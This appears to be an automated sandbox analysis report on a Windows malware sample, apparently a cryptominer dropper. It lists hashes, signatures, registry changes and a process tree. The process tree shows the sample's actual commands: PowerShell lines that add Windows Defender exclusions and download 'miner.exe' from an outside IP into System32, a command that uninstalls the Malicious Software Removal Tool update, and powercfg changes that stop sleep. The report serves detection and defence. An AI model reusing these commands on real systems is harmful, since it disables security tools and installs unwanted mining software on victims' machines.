Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
03-06-2024 03:56
Static task
static1
Behavioral task
behavioral1
Sample
397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe
Resource
win11-20240508-en
General
-
Target
397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe
-
Size
96KB
-
MD5
3a60efc9992d02574b59745cbdfb2334
-
SHA1
28d4ef82fc79c586b1e32995789a84c1043a9c55
-
SHA256
397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994
-
SHA512
2fb2b6983040a9b747748b1e4d7c0e88e06e39a364ab8bbef2f4ee06c9f3a84cbe4ec1112ae5640ab98c3dc8a1a9bbc52ee63ac652cdd4f34c5e1e76784618ea
-
SSDEEP
1536:xcx9ZYLP8rNqbfNqGEkLepf3NW7d9NE768l0e+SzF6JL5FhA7g/LSCvsW90VcdP0:xcqmqhkEeF3NWf8l0edFEhMgzgkP+vpP
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 1 3460 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2476 powershell.exe 2468 powershell.exe 1664 powershell.exe 3460 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts msdr.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 2 IoCs
pid Process 3148 msdr.exe 2128 updater.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\SysWOW64\msdr.exe powershell.exe File opened for modification C:\Windows\system32\MRT.exe msdr.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3148 set thread context of 232 3148 msdr.exe 93 PID 2128 set thread context of 2460 2128 updater.exe 116 PID 2128 set thread context of 4944 2128 updater.exe 117 PID 2128 set thread context of 3816 2128 updater.exe 122 -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 468 sc.exe 3848 sc.exe 3936 sc.exe 800 sc.exe -
Modifies data under HKEY_USERS 60 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 03 Jun 2024 03:57:39 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717387058" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={89530C2A-38A8-42F3-9293-D54761B800B4}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2476 powershell.exe 2476 powershell.exe 3460 powershell.exe 3460 powershell.exe 4484 powershell.exe 4484 powershell.exe 3148 msdr.exe 2468 powershell.exe 2468 powershell.exe 3148 msdr.exe 3148 msdr.exe 3148 msdr.exe 3148 msdr.exe 3148 msdr.exe 3148 msdr.exe 3148 msdr.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 3148 msdr.exe 3148 msdr.exe 3148 msdr.exe 2128 updater.exe 1664 powershell.exe 1664 powershell.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 1664 powershell.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 1664 powershell.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 1664 powershell.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 1664 powershell.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe 232 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 3460 powershell.exe Token: SeDebugPrivilege 4484 powershell.exe Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 232 dialer.exe Token: SeShutdownPrivilege 3340 powercfg.exe Token: SeCreatePagefilePrivilege 3340 powercfg.exe Token: SeShutdownPrivilege 644 powercfg.exe Token: SeCreatePagefilePrivilege 644 powercfg.exe Token: SeShutdownPrivilege 560 powercfg.exe Token: SeCreatePagefilePrivilege 560 powercfg.exe Token: SeShutdownPrivilege 4856 powercfg.exe Token: SeCreatePagefilePrivilege 4856 powercfg.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 2460 dialer.exe Token: SeShutdownPrivilege 2204 powercfg.exe Token: SeCreatePagefilePrivilege 2204 powercfg.exe Token: SeShutdownPrivilege 2528 powercfg.exe Token: SeCreatePagefilePrivilege 2528 powercfg.exe Token: SeShutdownPrivilege 4788 powercfg.exe Token: SeCreatePagefilePrivilege 4788 powercfg.exe Token: SeShutdownPrivilege 3548 powercfg.exe Token: SeCreatePagefilePrivilege 3548 powercfg.exe Token: SeLockMemoryPrivilege 3816 dialer.exe Token: SeAssignPrimaryTokenPrivilege 2692 svchost.exe Token: SeIncreaseQuotaPrivilege 2692 svchost.exe Token: SeSecurityPrivilege 2692 svchost.exe Token: SeTakeOwnershipPrivilege 2692 svchost.exe Token: SeLoadDriverPrivilege 2692 svchost.exe Token: SeSystemtimePrivilege 2692 svchost.exe Token: SeBackupPrivilege 2692 svchost.exe Token: SeRestorePrivilege 2692 svchost.exe Token: SeShutdownPrivilege 2692 svchost.exe Token: SeSystemEnvironmentPrivilege 2692 svchost.exe Token: SeUndockPrivilege 2692 svchost.exe Token: SeManageVolumePrivilege 2692 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2692 svchost.exe Token: SeIncreaseQuotaPrivilege 2692 svchost.exe Token: SeSecurityPrivilege 2692 svchost.exe Token: SeTakeOwnershipPrivilege 2692 svchost.exe Token: SeLoadDriverPrivilege 2692 svchost.exe Token: SeSystemtimePrivilege 2692 svchost.exe Token: SeBackupPrivilege 2692 svchost.exe Token: SeRestorePrivilege 2692 svchost.exe Token: SeShutdownPrivilege 2692 svchost.exe Token: SeSystemEnvironmentPrivilege 2692 svchost.exe Token: SeUndockPrivilege 2692 svchost.exe Token: SeManageVolumePrivilege 2692 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2692 svchost.exe Token: SeIncreaseQuotaPrivilege 2692 svchost.exe Token: SeSecurityPrivilege 2692 svchost.exe Token: SeTakeOwnershipPrivilege 2692 svchost.exe Token: SeLoadDriverPrivilege 2692 svchost.exe Token: SeSystemtimePrivilege 2692 svchost.exe Token: SeBackupPrivilege 2692 svchost.exe Token: SeRestorePrivilege 2692 svchost.exe Token: SeShutdownPrivilege 2692 svchost.exe Token: SeSystemEnvironmentPrivilege 2692 svchost.exe Token: SeUndockPrivilege 2692 svchost.exe Token: SeManageVolumePrivilege 2692 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2692 svchost.exe Token: SeIncreaseQuotaPrivilege 2692 svchost.exe Token: SeSecurityPrivilege 2692 svchost.exe Token: SeTakeOwnershipPrivilege 2692 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4812 wrote to memory of 2476 4812 DllHost.exe 78 PID 4812 wrote to memory of 2476 4812 DllHost.exe 78 PID 4812 wrote to memory of 2476 4812 DllHost.exe 78 PID 4812 wrote to memory of 3460 4812 DllHost.exe 80 PID 4812 wrote to memory of 3460 4812 DllHost.exe 80 PID 4812 wrote to memory of 3460 4812 DllHost.exe 80 PID 3852 wrote to memory of 4484 3852 DllHost.exe 83 PID 3852 wrote to memory of 4484 3852 DllHost.exe 83 PID 3852 wrote to memory of 4484 3852 DllHost.exe 83 PID 4484 wrote to memory of 3148 4484 powershell.exe 85 PID 4484 wrote to memory of 3148 4484 powershell.exe 85 PID 3148 wrote to memory of 232 3148 msdr.exe 93 PID 3148 wrote to memory of 232 3148 msdr.exe 93 PID 3148 wrote to memory of 232 3148 msdr.exe 93 PID 3148 wrote to memory of 232 3148 msdr.exe 93 PID 3148 wrote to memory of 232 3148 msdr.exe 93 PID 3148 wrote to memory of 232 3148 msdr.exe 93 PID 3148 wrote to memory of 232 3148 msdr.exe 93 PID 1084 wrote to memory of 4192 1084 cmd.exe 103 PID 1084 wrote to memory of 4192 1084 cmd.exe 103 PID 232 wrote to memory of 624 232 dialer.exe 5 PID 232 wrote to memory of 692 232 dialer.exe 7 PID 232 wrote to memory of 984 232 dialer.exe 12 PID 232 wrote to memory of 428 232 dialer.exe 13 PID 232 wrote to memory of 436 232 dialer.exe 14 PID 232 wrote to memory of 1040 232 dialer.exe 15 PID 232 wrote to memory of 1048 232 dialer.exe 16 PID 232 wrote to memory of 1056 232 dialer.exe 17 PID 232 wrote to memory of 1116 232 dialer.exe 18 PID 232 wrote to memory of 1208 232 dialer.exe 20 PID 232 wrote to memory of 1240 232 dialer.exe 21 PID 232 wrote to memory of 1284 232 dialer.exe 22 PID 232 wrote to memory of 1372 232 dialer.exe 23 PID 232 wrote to memory of 1416 232 dialer.exe 24 PID 232 wrote to memory of 1504 232 dialer.exe 25 PID 232 wrote to memory of 1616 232 dialer.exe 26 PID 232 wrote to memory of 1624 232 dialer.exe 27 PID 232 wrote to memory of 1648 232 dialer.exe 28 PID 232 wrote to memory of 1740 232 dialer.exe 29 PID 232 wrote to memory of 1772 232 dialer.exe 30 PID 232 wrote to memory of 1832 232 dialer.exe 31 PID 232 wrote to memory of 1912 232 dialer.exe 32 PID 232 wrote to memory of 2016 232 dialer.exe 33 PID 232 wrote to memory of 2024 232 dialer.exe 34 PID 232 wrote to memory of 1984 232 dialer.exe 35 PID 232 wrote to memory of 2052 232 dialer.exe 36 PID 232 wrote to memory of 2140 232 dialer.exe 37 PID 232 wrote to memory of 2252 232 dialer.exe 39 PID 232 wrote to memory of 2352 232 dialer.exe 40 PID 232 wrote to memory of 2500 232 dialer.exe 41 PID 232 wrote to memory of 2512 232 dialer.exe 42 PID 232 wrote to memory of 2536 232 dialer.exe 43 PID 232 wrote to memory of 2620 232 dialer.exe 44 PID 232 wrote to memory of 2644 232 dialer.exe 45 PID 232 wrote to memory of 2668 232 dialer.exe 46 PID 232 wrote to memory of 2684 232 dialer.exe 47 PID 232 wrote to memory of 2692 232 dialer.exe 48 PID 232 wrote to memory of 2740 232 dialer.exe 49 PID 232 wrote to memory of 2812 232 dialer.exe 50 PID 232 wrote to memory of 3096 232 dialer.exe 51 PID 232 wrote to memory of 3272 232 dialer.exe 52 PID 232 wrote to memory of 3436 232 dialer.exe 53 PID 232 wrote to memory of 3476 232 dialer.exe 54 PID 232 wrote to memory of 3808 232 dialer.exe 57
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:428
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1208
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1240
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1416
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2740
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1832
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2052
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2252
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2620
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2812
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3096
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe"C:\Users\Admin\AppData\Local\Temp\397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994.exe"2⤵PID:756
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3476
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3808
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3868
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3992
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3424
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3204
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1360
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3328
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2868
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "http://45.67.229.122/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3460
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\SysWOW64\msdr.exe"C:\Windows\System32\msdr.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:4192
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
